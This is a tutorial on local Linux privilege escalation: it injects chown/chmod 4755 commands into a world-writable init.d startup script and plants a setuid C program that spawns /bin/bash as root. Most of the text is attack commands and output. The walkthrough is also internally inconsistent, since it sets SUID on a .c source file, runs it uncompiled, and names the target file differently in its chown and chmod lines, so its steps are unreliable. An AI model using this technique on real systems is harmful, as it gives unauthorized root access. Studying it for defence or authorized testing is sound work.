Exploiting Startup Scripts
Startups scripts are scripts that are executed at boot time. Linux startup scripts are generally located in /etc/init.d but this location can vary depending on the distribution. For example, you may find startup scripts under these locations: /etc/rc.d, /etc/rc.d/init.d, or /etc/init. These scripts can either be default scripts that are pre-installed, or they can be user created startup scripts.
To attack a vulnerable startup script, you must determine if you have write access to a certain startup script. If you have write access, you can inject your own malicious commands into the script and either wait for a reboot, or a force a reboot to trigger the script.
Below is an example of how you might attack a vulnerable startup script:
First identify any files that have write access enabled on them using the command below, and specifically look for files under the /etc/init.d directory. (We can exclude irrelevant output by piping our output with “| grep -v”
user@target:$ find / -perm -o+w -type f 2>/dev/null | grep -v '/sys\|proc'/foo/bar/etc/init.d/cleanup.sh/foo/bar/foo
We notice that there is a startup script called cleanup.sh under the /etc/init.d directory that we have write access to. First, we should back this file up and then we can edit the startup script:
user@target:$ cp cleanup.sh /home/user/cleanup.sh.bakuser@target:$ nano cleanup.sh
We open the file and replace the original script with our malicious script:
chown root:root /home/user/pwn_script.cchmod 4755 /home/user/pwn_script
The script we just added to the startup script will change the file pwn_script.c in the user’s home directory so it has the SUID bit set on it which means when we run it, it will be run as root. Wait, we haven’t created the pwn_script.c yet so let’s go ahead and do that. We need to make sure it is located where it is pointing to in the startup script which in this case is /home/user/pwn_script.c
#include <stdio.h>#include <stdlib.h>int main(){setgid(0);setuid(0);system("/bin/bash");}
After we have created our malicious startup file and our pwn_script.c, we just need to wait for a reboot or trigger it manually.
After the system reboots, we can navigate to our pwn_script.c file and see the new permissions on it:
-rwsrwxr-x 1 root root 6700 April 9 14:43 /home/user/pwn_script.c
Notice the SUID bit is set on the permissions and the owner is root. After we run pwn_script.c, we should now have a root shell.
user@target:$ ./pwn_script.cbash-4.1# whoamiroot